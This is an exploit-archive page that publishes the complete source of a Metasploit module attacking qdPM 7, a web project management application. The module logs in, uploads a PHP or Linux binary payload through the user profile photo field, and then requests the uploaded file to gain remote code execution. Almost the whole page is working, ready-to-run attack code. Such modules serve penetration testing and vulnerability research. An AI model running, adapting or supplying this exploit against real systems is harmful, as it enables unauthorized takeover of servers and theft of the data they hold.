exploit the possibilities

qdPM 7 Arbitrary PHP File Upload

qdPM 7 Arbitrary PHP File Upload
Posted Sep 14, 2012
Authored by loneferret, sinn3r | Site metasploit.com

This Metasploit module exploits a vulnerability found in qdPM - a web-based project management software. The user profile's photo upload feature can be abused to upload any arbitrary file onto the victim server machine, which allows remote code execution. Please note in order to use this module, you must have a valid credential to sign in.

tags | exploit, remote, web, arbitrary, code execution
advisories | OSVDB-82978
MD5 | 46ae2a16374db84846a7a66a93c7cbc4

qdPM 7 Arbitrary PHP File Upload

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE

def initialize(info={})
super(update_info(info,
'Name' => "qdPM v7 Arbitrary PHP File Upload Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in qdPM - a web-based project management
software. The user profile's photo upload feature can be abused to upload any
arbitrary file onto the victim server machine, which allows remote code execution.
Please note in order to use this module, you must have a valid credential to sign
in.
},
'License' => MSF_LICENSE,
'Author' =>
[
'loneferret', #Discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '82978'],
['EDB', '19154']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Platform' => ['linux', 'php'],
'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
],
'Privileged' => false,
'DisclosureDate' => "Jun 14 2012",
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, 'The base directory to sflog!', '/qdPM/']),
OptString.new('USERNAME', [true, 'The username to login with']),
OptString.new('PASSWORD', [true, 'The password to login with'])
], self.class)
end

def check
target_uri.path << '/' if target_uri.path[-1,1] != '/'
base = File.dirname("#{target_uri.path}.")

res = send_request_raw({'uri'=>"#{base}/index.php"})
if res and res.body =~ /<div id\=\"footer\"\>.+qdPM ([\d])\.([\d]).+\<\/div\>/m
major, minor = $1, $2
return Exploit::CheckCode::Vulnerable if (major+minor).to_i <= 70
end

return Exploit::CheckCode::Safe
end

def get_write_exec_payload(fname, data)
p = Rex::Text.encode_base64(generate_payload_exe)
php = %Q|
<?php
$f = fopen("#{fname}", "wb");
fwrite($f, base64_decode("#{p}"));
fclose($f);
exec("chmod 777 #{fname}");
exec("#{fname}");
?>
|
php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ')
return php
end

def on_new_session(cli)
if cli.type == "meterpreter"
cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
end

@clean_files.each do |f|
print_status("#{@peer} - Removing: #{f}")
begin
if cli.type == 'meterpreter'
cli.fs.file.rm(f)
else
cli.shell_command_token("rm #{f}")
end
rescue ::Exception => e
print_error("#{@peer} - Unable to remove #{f}: #{e.message}")
end
end
end

def login(base, username, password)
# Login
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}/index.php/home/login",
'vars_post' => {
'login[email]' => username,
'login[password]' => password,
'http_referer' => ''
},
# This needs to be set, otherwise we get two cookies... I don't need two cookies.
'cookie' => "qdpm=#{Rex::Text.rand_text_alpha(27)}",
'headers' => {
'Origin' => "http://#{rhost}",
'Referer' => "http://#{rhost}/#{base}/index.php/home/login"
}
})

cookie = (res and res.headers['Set-Cookie'] =~ /qdpm\=.+\;/) ? res.headers['Set-Cookie'] : ''
return {} if cookie.empty?
cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0]

# Get user data
vprint_status("#{@peer} - Enumerating user data")
res = send_request_raw({
'uri' => "#{base}/index.php/home/myAccount",
'cookie' => cookie
})

return {} if not res
if res.code == 404
print_error("#{@peer} - #{username} does not actually have a 'myAccount' page")
return {}
end

b = res.body

user_id = b.scan(/\<input type\=\"hidden\" name\=\"users\[id\]\" value\=\"(.+)\" id\=\"users\_id\" \/\>/).flatten[0] || ''
group_id = b.scan(/\<input type\=\"hidden\" name\=\"users\[users\_group\_id\]\" value\=\"(.+)\" id\=\"users\_users\_group\_id\" \/>/).flatten[0] || ''
user_active = b.scan(/\<input type\=\"hidden\" name\=\"users\[active\]\" value\=\"(.+)\" id\=\"users\_active\" \/\>/).flatten[0] || ''

opts = {
'cookie' => cookie,
'user_id' => user_id,
'group_id' => group_id,
'user_active' => user_active
}

return opts
end

def upload_php(base, opts)
fname = opts['filename']
php_payload = opts['data']
user_id = opts['user_id']
group_id = opts['group_id']
user_active = opts['user_active']
username = opts['username']
email = opts['email']
cookie = opts['cookie']

data = Rex::MIME::Message.new
data.add_part('UsersAccountForm', nil, nil, 'form-data; name="formName"')
data.add_part('put', nil, nil, 'form-data; name="sf_method"')
data.add_part(user_id, nil, nil, 'form-data; name="users[id]"')
data.add_part(group_id, nil, nil, 'form-data; name="users[users_group_id]"')
data.add_part(user_active, nil, nil, 'form-data; name="users[active]"')
data.add_part('', nil, nil, 'form-data; name="users[skin]"')
data.add_part(username, nil, nil, 'form-data; name="users[name]"')
data.add_part(php_payload, nil, nil, "form-data; name=\"users[photo]\"; filename=\"#{fname}\"")
data.add_part('', nil, nil, 'form-data; name="preview_photo"')
data.add_part(email, nil, nil, 'form-data; name="users[email]"')
data.add_part('en_US', nil, nil, 'form-data; name="users[culture]"')
data.add_part('', nil, nil, 'form-data; name="new_password"')

post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}/index.php/home/myAccount",
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie,
'headers' => {
'Origin' => "http://#{rhost}",
'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"
}
})

return (res and res.headers['Location'] =~ /home\/myAccount$/) ? true : false
end

def exec_php(base, opts)
cookie = opts['cookie']

# When we upload a file, it will be renamed. The 'myAccount' page has that info.
res = send_request_cgi({
'uri' => "#{base}/index.php/home/myAccount",
'cookie' => cookie
})

if not res
print_error("#{@peer} - Unable to request the file")
return
end

fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || ''
if fname.empty?
print_error("#{@peer} - Unable to extract the real filename")
return
end

# Now that we have the filename, request it
print_status("#{@peer} - Uploaded file was renmaed as '#{fname}'")
send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"})
handler
end

def exploit
@peer = "#{rhost}:#{rport}"

target_uri.path << '/' if target_uri.path[-1,1] != '/'
base = File.dirname("#{target_uri.path}.")

user = datastore['USERNAME']
pass = datastore['PASSWORD']
print_status("#{@peer} - Attempt to login with '#{user}:#{pass}'")
opts = login(base, user, pass)
if opts.empty?
print_error("#{@peer} - Login unsuccessful")
return
end

php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"
@clean_files = [php_fname]

case target['Platform']
when 'php'
p = "<?php #{payload.encoded} ?>"
when 'linux'
bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"
@clean_files << bin_name
bin = generate_payload_exe
p = get_write_exec_payload("/tmp/#{bin_name}", bin)
end

print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
opts = opts.merge({
'username' => user.scan(/^(.+)\@.+/).flatten[0] || '',
'email' => user,
'filename' => php_fname,
'data' => p
})
uploader = upload_php(base, opts)
if not uploader
print_error("#{@peer} - Unable to upload")
return
end

print_status("#{@peer} - Executing '#{php_fname}'")
exec_php(base, opts)
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    12 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    16 Files
  • 22
    May 22nd
    3 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close